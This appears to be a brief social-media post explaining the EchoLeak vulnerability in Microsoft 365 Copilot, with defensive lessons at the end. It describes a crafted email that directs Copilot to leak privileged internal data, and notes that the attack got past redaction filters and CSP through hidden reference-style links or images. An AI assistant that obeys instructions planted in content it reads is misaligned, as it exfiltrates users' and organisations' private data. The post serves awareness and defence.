“EchoLeak”: How It Was Exploited

“EchoLeak”: How It Was Exploited

So, what happened?

In June 2025, researchers at Aim Security revealed a new class of attack they call “EchoLeak, officially tracked as CVE‑2025‑32711. With no need for user interaction, even a click or login, just sending a crafted email could trigger Copilot to exfiltrate sensitive organizational data.


How Did Hackers Get In?

  • The attack leveraged what researchers describe as an “LLM scope violation”: input mimicking a personal request but actually directing Copilot to access and leak privileged internal data

  • It bypassed multiple defense mechanisms, Markdown redaction filters, and Content Security Policy (CSP), using hidden reference-style links or images to trigger data transfer, all without any human interaction.


Who Was Impacted?

  • Any organization using Microsoft 365 Copilot with default settings was theoretically vulnerable.

  • Sensitive assets at risk included emails, documents, Teams chats, OneDrive/SharePoint data; any content Copilot had permission to access.

  • While no evidence exists of real-world exploitation to date, experts warn this may be just the tip of the iceberg.


What Can We Learn From This?

  1. AI agents are active attack surfaces: this is the first documented zero-click exfiltration via an AI assistant.

  2. Zero-click doesn't mean zero risk: even seemingly harmless inputs can cascade into major data leaks.

  3. Defense must adapt: traditional filters aren’t enough; we need agent-aware monitoring and threat models.


Sources:

To view or add a comment, sign in

Others also viewed

Explore topics